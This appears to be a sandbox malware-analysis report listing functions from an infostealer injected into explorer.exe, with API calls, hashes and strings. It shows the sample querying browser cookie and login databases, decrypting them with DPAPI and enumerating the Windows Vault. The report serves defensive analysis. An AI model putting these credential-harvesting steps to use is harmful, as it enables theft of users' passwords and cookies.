Not Executed

APIs

Part of subcall function 03F132EC: CreateFileW.KERNEL32 ref: 03F13332
Part of subcall function 03F132EC: ReadFile.KERNEL32 ref: 03F13379
Part of subcall function 03F132EC: CloseHandle.KERNEL32 ref: 03F133AF

ResumeThread.KERNEL32 ref: 03F12EFE
SleepEx.KERNEL32 ref: 03F12F43

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadResumeSleepThread
String ID:
API String ID: 2967322886-0
Opcode ID: 808c4aee07e9b8fc3710cb3cfd08703c7f933d42faf171cdfe3304c79b09faa0
Instruction ID: a4b35f2aca3d83f6e3f1a6215f7864bd538d9f2d5a3f0c898818fe4401b7419c
Opcode Fuzzy Hash: 808c4aee07e9b8fc3710cb3cfd08703c7f933d42faf171cdfe3304c79b09faa0
Instruction Fuzzy Hash: EC71A830708F499FD768EB68D8587BAB3E2FB98311F54452DD49EC7241DF34A8528782

Function 03F14A40 Relevance: 3.1, APIs: 2, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.ADVAPI32 ref: 03F14A94
GetTokenInformation.ADVAPI32 ref: 03F14ACB

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: dd184fa1f844f5e8a027601eca024ae3d96259d199610c41deb9d1b16245fd89
Instruction ID: b3073f6a4c96599acd326a9d9390f9c9f07de562663df3b065a4b5eea4c5e508
Opcode Fuzzy Hash: dd184fa1f844f5e8a027601eca024ae3d96259d199610c41deb9d1b16245fd89
Instruction Fuzzy Hash: 1C213134608B488FC754EB28D49866AB7F2FBD9311B000A6EE49EC7264CB70E845DB81

Function 03F13CD0 Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32 ref: 03F13CEC
SleepEx.KERNEL32 ref: 03F13CF7

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: EnumSleepWindows
String ID:
API String ID: 498413330-0
Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
Instruction ID: 7d3923eaf92ea6fce2d36599f6d2d69ec59c036f737c828d4a198accd0c49510
Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
Instruction Fuzzy Hash: 92E04F30A046098FEB28EBA4C0D8BB036A2EB18206F28017BDC0EDD285CB764955C720

Function 03F14578 Relevance: 1.6, APIs: 1, Instructions: 119processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32 ref: 03F1465C

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: f499db2da455559fe39320c52f4be417c059e9f1e2dbc18636465e4cf963e26f
Instruction ID: ad687d4c1e9825856da35244f014a3978af48ac88cb480991580ac3f32e30d34
Opcode Fuzzy Hash: f499db2da455559fe39320c52f4be417c059e9f1e2dbc18636465e4cf963e26f
Instruction Fuzzy Hash: 24316B70718F484FCB98EF68A08875AB6E2FBD8311F104A6EE44ED7249DFB4D8458781

Function 03F14C90 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32 ref: 03F14CFD

Part of subcall function 03F15174: CryptAcquireContextA.ADVAPI32 ref: 03F151A9

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: AcquireContextCryptInformationVolume
String ID:
API String ID: 4059528372-0
Opcode ID: 6360c7cb42068f0464419020233b993fd04aec100295d9fc2771373569cbd1ae
Instruction ID: 20d5ea0a1fc6c2619e6ef1b29578c087aedfed5a47bc2f8bf16bd5c242b8c32a
Opcode Fuzzy Hash: 6360c7cb42068f0464419020233b993fd04aec100295d9fc2771373569cbd1ae
Instruction Fuzzy Hash: D3316931618B4C8FDB64EF68D848BAA77E1FBE8311F10462E984ED7264DE30D9458B81

Function 03F11980 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 03F119D0: RtlCreateHeap.NTDLL ref: 03F11AE7

SleepEx.KERNEL32(?,?,?,?,?,?,?,03F11973), ref: 03F119A0

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeapSleep
String ID:
API String ID: 221814145-0
Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
Instruction ID: 5a3e2d2818d95181a13b116223679336c80df74f007b39ff42168fe8c4c31eba
Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
Instruction Fuzzy Hash: FBE04814714B0D5BDB94F779B88473C72A1DBC8250F941579662FCA285D824C8608312

Analysis Process: rugtucwPID: 4036, Parent PID: 4004COMMON

Executed Functions

Function 002D0E30 Relevance: 6.7, Strings: 5, Instructions: 440COMMON

Download Yara Rule

Strings

D@(, xrefs: 002D1141
<Q(, xrefs: 002D1039
D@(, xrefs: 002D11CB
D@(, xrefs: 002D1186
D@(, xrefs: 002D10FC

Memory Dump Source

Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd

Similarity

API ID:
String ID: <Q($D@($D@($D@($D@(
API String ID: 0-3811455346
Opcode ID: 4bc4beb4afbd806fa74f9af4b1a45304a6e4014ad1fc9ebd0b5f45e0adeb440a
Instruction ID: 8429db74f1fa85a2ab0a671fc7dd74302b9d5344744917b2108e7ac53c8172df
Opcode Fuzzy Hash: 4bc4beb4afbd806fa74f9af4b1a45304a6e4014ad1fc9ebd0b5f45e0adeb440a
Instruction Fuzzy Hash: 3B02B3316102559FCB14EF64D894AAEB7F6FFC4300F148A6AE9099B395DB71EC42CB90

Function 002D1498 Relevance: 2.6, Strings: 2, Instructions: 54COMMON

Download Yara Rule

Strings

D@(, xrefs: 002D14D7
D@(, xrefs: 002D14C5

Memory Dump Source

Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd

Similarity

API ID:
String ID: D@($D@(
API String ID: 0-1322129975
Opcode ID: 7d633d8faf910608cc41b3142252474fe7b30a15c952532c3ba79d292cfaabf3
Instruction ID: 70ab0bcbdaacb9dab71a06b6aa8f89f18eeed378f3e835e8be84ec033fd436ca
Opcode Fuzzy Hash: 7d633d8faf910608cc41b3142252474fe7b30a15c952532c3ba79d292cfaabf3
Instruction Fuzzy Hash: 03112B35B101149FC705BBB5E85979D7FB5DF86300F0040ABE6199B395DE349D05C7A1

Function 002D1539 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

8!p, xrefs: 002D1555

Memory Dump Source

Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd

Similarity

API ID:
String ID: 8!p
API String ID: 0-2808226621
Opcode ID: ff099371b8e47087d10af0d972824f13c97d16e2762f7116254e4e4c13dc5f3c
Instruction ID: 0530aa2b99ff840cdbbcdfeead8db18bbf15b2b60ec39439d4e4b0b8accebc95
Opcode Fuzzy Hash: ff099371b8e47087d10af0d972824f13c97d16e2762f7116254e4e4c13dc5f3c
Instruction Fuzzy Hash: 6E116636615390AFD703AB74F898B593F689B86320F0541DBE5118B793E9209D14CBA0

Function 002D09B0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1087c0c226eb2670a266267eb981c944aa5592c7f76453e0f4b3cfdcdf9a09ce
Instruction ID: efd891778097760c93ee6f4a5608d39b165886504278c2ba1eebc3751f3b2cb6
Opcode Fuzzy Hash: 1087c0c226eb2670a266267eb981c944aa5592c7f76453e0f4b3cfdcdf9a09ce
Instruction Fuzzy Hash: DBD15F38215302CFD705DF24D888B6A7BE6FF89304F64896AD9068B365DB75EC51CBA0

Function 002D08B0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9152d969f965ca20d8e4d23aa7ba5c4a8511d97070dab1d5b58749d790d0a1dd
Instruction ID: 464fe26568d6834c8a2149a7e5be1f0cc4dcf461938628378e8438b63a9b4642
Opcode Fuzzy Hash: 9152d969f965ca20d8e4d23aa7ba5c4a8511d97070dab1d5b58749d790d0a1dd
Instruction Fuzzy Hash: DC212C343406108FC749EF38C46992D7BE6AF8A75532545E9E406CF3B2DA35EC42CB91

Function 002D1348 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e3baf51c93973be23185843df4ffc181376a9d72119fa27fb958b408af082d9
Instruction ID: f20bcccc2007b25ed9aa0e901cf9e926855147fb8348c9d2183fa077993417af
Opcode Fuzzy Hash: 4e3baf51c93973be23185843df4ffc181376a9d72119fa27fb958b408af082d9
Instruction Fuzzy Hash: 2B012B76701611AFC3219B25F88CD1F3BA8EB897607120696F945CB719DA70DC1087A0

Function 002D1421 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4591a5e01f29322e8bd89fff20d5379eb8d640b52efe580b3d8d18aad2d29d7
Instruction ID: bca8b0a08980cca5302f7b311f7491ecc4af88eea4f50afe2a5660c8b813f26a
Opcode Fuzzy Hash: d4591a5e01f29322e8bd89fff20d5379eb8d640b52efe580b3d8d18aad2d29d7
Instruction Fuzzy Hash: AAF0B4B170A3502FD7091B356C55AAF7BA9DFCA15070844BBE809C7392DD759C0683E0

Function 002D0857 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ff1879d5ad57094083ef2971a04cddf89bd0c1f27ec91fa7658c1b66487eaa1
Instruction ID: 05296cc8fe91ec13f45ed512a18164a47efed32920c47de5eb432944978fe2a6
Opcode Fuzzy Hash: 0ff1879d5ad57094083ef2971a04cddf89bd0c1f27ec91fa7658c1b66487eaa1
Instruction Fuzzy Hash: 4CF02B35A0D38DAFC706DFF5A85C5CA7FFCEE46110B0440EBE408C7212E53058008761

Function 002D0868 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 122641562822a8883af0971b01322605cd3e2a8c3e30008c5c50e867d69922a6
Instruction ID: ed3e768b72843b239ec9f67af6d02a1be0b5a7d3eaa75535f43a6870f092ede4
Opcode Fuzzy Hash: 122641562822a8883af0971b01322605cd3e2a8c3e30008c5c50e867d69922a6
Instruction Fuzzy Hash: 6BE06D3AA0411AAF8B04EFA9B84C5DA7BE9FA48222B008066E009D2210EA7058408790

Function 002D13E0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4b151ba6cf8896445ff80e2df596d5432daffe1aa59a5ac6300690adaab38c3
Instruction ID: 55d1bd0f3348509a178ab7289a46540cd0047fea4fbd06d9ddb358eb25a9d324
Opcode Fuzzy Hash: c4b151ba6cf8896445ff80e2df596d5432daffe1aa59a5ac6300690adaab38c3
Instruction Fuzzy Hash: A8E0863810A3848FC7469F30B95C5113FE89B46300F4504D6E5858B267DA345C54C7B4

Function 002D1489 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3232ac24f5accbcd9947c3595fceab207085faffdc688e0dbae51ccef1f9d773
Instruction ID: e42229cf6dcddfd9983e6db8bd9d72e21d2faf3a68f968846794796fdec0887b
Opcode Fuzzy Hash: 3232ac24f5accbcd9947c3595fceab207085faffdc688e0dbae51ccef1f9d773
Instruction Fuzzy Hash: D8D0A776A0AA617BCB0156B5BD1D28C3F649A16250B0440BBD848C7191E6048D2483D2

Function 002D1590 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea6dfa81113593beaab303e079e3ab8cd2ad56754a332d29ebddd99e2346b627
Instruction ID: 2a8682b33a897d7240639414280824d4f23eb3488aae6697b69ef193c056ddff
Opcode Fuzzy Hash: ea6dfa81113593beaab303e079e3ab8cd2ad56754a332d29ebddd99e2346b627
Instruction Fuzzy Hash: B5C0129848E2C02EDB03233028296043FB00B87208F89A0CBD1804A0F3C84C0828C329

Analysis Process: explorer.exePID: 4072, Parent PID: 1244COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	53.6%
Signature Coverage:	16.2%
Total number of Nodes:	586
Total number of Limit Nodes:	30

Executed Functions

Function 00083717 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 401
stringfileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
Part of subcall function 00081B6A: CloseHandle.KERNEL32(00000000), ref: 00081B8F

GetTempPathW.KERNEL32(00000104,00000000), ref: 00083778
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00083782
DeleteFileW.KERNELBASE(00000000), ref: 00083789
CopyFileW.KERNEL32(?,00000000,00000000), ref: 00083794
RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0008383B
RtlZeroMemory.NTDLL(?,00000040), ref: 00083870
lstrlen.KERNEL32(?,?,?,?,?), ref: 0008398B
lstrlen.KERNEL32(00000000), ref: 0008399A
wsprintfA.USER32 ref: 000839F1
lstrlen.KERNEL32(00000000,?,?), ref: 000839FD
lstrcat.KERNEL32(00000000,?), ref: 00083A21
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00083A49
lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00083B13
lstrlen.KERNEL32(00000000), ref: 00083B22
wsprintfA.USER32 ref: 00083B79
lstrlen.KERNEL32(00000000), ref: 00083B85
lstrcat.KERNEL32(00000000,?), ref: 00083BA9
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00083BDA
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00083C16

Strings

TRUE, xrefs: 000839C9, 00083B51
FALSE, xrefs: 000839BC, 00083B3C
%sTRUE%s%s%s%s%s, xrefs: 000839EB, 00083B73
v1, xrefs: 00083821
0, xrefs: 00083828
SELECT host_key,path,is_secure,name,encrypted_value FROM cookies, xrefs: 000837C3
COOKIES, xrefs: 00083BE8, 00083BED, 00083BF6

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
API String ID: 584740257-404540950
Opcode ID: db6ce6ab68a3e9764131aac09ebcdc44c456b69e7b9ac3fe299efac07930bcfc
Instruction ID: 670c89e043a30e7cd80d5367027ab5f5eb9d687dfe2f4516304c8600e554ace9
Opcode Fuzzy Hash: db6ce6ab68a3e9764131aac09ebcdc44c456b69e7b9ac3fe299efac07930bcfc
Instruction Fuzzy Hash: 1DE19B70209341AFE715EF24C884AAFBBE9BFC5B44F04482DF9C586252DB79C905CB62

Function 00082198 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 242
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(?,00000114), ref: 000821AF
GetVersionExW.KERNEL32(?), ref: 000821BE
LoadLibraryW.KERNEL32(vaultcli.dll), ref: 000821E8
GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0008220A
GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 00082214
GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00082220
GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0008222A
GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00082236
RtlCompareMemory.NTDLL(?,000E1110,00000010), ref: 000822E8
RtlCompareMemory.NTDLL(?,000E1110,00000010), ref: 0008236C

Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994

StrStrIW.SHLWAPI(?,Internet Explorer), ref: 000823FE
FreeLibrary.KERNELBASE(00000000), ref: 00082493

Strings

VaultOpenVault, xrefs: 00082204
VaultEnumerateItems, xrefs: 00082216
vaultcli.dll, xrefs: 000821E3
VaultCloseVault, xrefs: 0008220C
VaultFree, xrefs: 0008222C
VaultGetItem, xrefs: 00082222
Internet Explorer, xrefs: 000823F8

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
API String ID: 2583887280-2831467701
Opcode ID: 2c67f8b11e6fd3aab0010db11284c43f56d8013b8eb1cf378e18b5c8592d3f89
Instruction ID: 98d066dbc322e4484caac54a837068d24d4d34c7b6dd7bdaef90f102b542e3a8
Opcode Fuzzy Hash: 2c67f8b11e6fd3aab0010db11284c43f56d8013b8eb1cf378e18b5c8592d3f89
Instruction Fuzzy Hash: 5A918B71A083009FD754EF65C884AAFBBEABF98704F00482EF9C597251EB75D941CB62

Function 00083098 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248
fileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
Part of subcall function 00081B6A: CloseHandle.KERNEL32(00000000), ref: 00081B8F

GetTempPathW.KERNEL32(00000104,00000000), ref: 000830F9
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00083103
DeleteFileW.KERNELBASE(00000000), ref: 0008310A
CopyFileW.KERNEL32(?,00000000,00000000), ref: 00083115
RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 000831A4
RtlZeroMemory.NTDLL(?,00000040), ref: 000831D7
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000832DF
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 0008339C

Strings

SELECT origin_url,username_value,password_value FROM logins, xrefs: 00083136
v1, xrefs: 0008318A
0, xrefs: 00083191
@, xrefs: 000831F1

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
API String ID: 2757140130-4052020286
Opcode ID: 7b8a3af755972ef78207df5a19dd5ecacb4dc09b70ee8be2efa8515fb43bf584
Instruction ID: 9eeee0a49cad79a680b91747a9da1137e025b2c57e8320bddd38074415eb84c5
Opcode Fuzzy Hash: 7b8a3af755972ef78207df5a19dd5ecacb4dc09b70ee8be2efa8515fb43bf584
Instruction Fuzzy Hash: 0691AD71208341ABE710EF64C844AAFBBE9BFC5B44F04092DF9C596252DB75DE05CB62

Function 00083ED9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 00083F0A
FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00083F16
lstrcmpiW.KERNEL32(?,000D62CC), ref: 00083F38
lstrcmpiW.KERNEL32(?,000D62D0), ref: 00083F4C
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00083F69
lstrcmpiW.KERNEL32(?,Local State), ref: 00083F7E
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00083F9B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00083FB5
FindClose.KERNELBASE(00000000), ref: 00083FC4

Strings

*.*, xrefs: 00083F01
Local State, xrefs: 00083F78

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
String ID: *.*$Local State
API String ID: 3923353463-3324723383
Opcode ID: c5aaf5cf6c109a5247499879bb6aba34656f063be9491def208fa3bdd5a4ad27
Instruction ID: 4d7f345a5cfc812a584ff706badc4d4ef345a41b1eec5ce1d2c75e72a3eebf84
Opcode Fuzzy Hash: c5aaf5cf6c109a5247499879bb6aba34656f063be9491def208fa3bdd5a4ad27
Instruction Fuzzy Hash: 3E21A1306007446BE750BB309C48ABF7BACBFC5B01B04052AFE92C6193DB7A994987B1

Function 00081D4A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000819B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00082CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000819C4

FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00081DA9
lstrcmpiW.KERNEL32(?,000D62CC), ref: 00081DCF
lstrcmpiW.KERNEL32(?,000D62D0), ref: 00081DE7
lstrcmpiW.KERNEL32(?,?), ref: 00081E62

Part of subcall function 00081CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,00082C27), ref: 00081D02
Part of subcall function 00081CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00081D0D

FindNextFileW.KERNELBASE(00000000,00000010), ref: 00081E94
FindClose.KERNELBASE(00000000), ref: 00081EA3

Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994

Strings

*.*, xrefs: 00081D8B
\*.*, xrefs: 00081D79

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
String ID: *.*$\*.*
API String ID: 232625764-1692270452
Opcode ID: 65a225ab1a58f3f422f0424303caeb68fc7b63a73906993df938be3e58dc8cfd
Instruction ID: 283d2ebab425d3c3d28c1f47b27243124ba92c37555bb5800a8c20e13b937d5b
Opcode Fuzzy Hash: 65a225ab1a58f3f422f0424303caeb68fc7b63a73906993df938be3e58dc8cfd
Instruction Fuzzy Hash: E93185303043415BDB61BB749898AEF7BEEBFC4350F044929EDC683256DB7588468761

Function 00083E04 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 75
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
Part of subcall function 00081B6A: CloseHandle.KERNEL32(00000000), ref: 00081B8F

Part of subcall function 00081C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00081C46
Part of subcall function 00081C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,00083FA8), ref: 00081C56
Part of subcall function 00081C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00081C76
Part of subcall function 00081C31: CloseHandle.KERNEL32(00000000), ref: 00081C91

Part of subcall function 00082FB1: StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 00082FC1
Part of subcall function 00082FB1: lstrlen.KERNEL32("encrypted_key":",?,00083FA8), ref: 00082FCE
Part of subcall function 00082FB1: StrStrIA.SHLWAPI("encrypted_key":",000D692C), ref: 00082FDD

Part of subcall function 0008123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00083E4B,00000000), ref: 0008124A
Part of subcall function 0008123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00081268
Part of subcall function 0008123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00081295

RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 00083E74
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00083E9E

Strings

IDPAP, xrefs: 00083E6E, 00083E72
DPAP, xrefs: 00083E5A
, xrefs: 00083EA8
DPAP, xrefs: 00083E52

Memory Dump Source

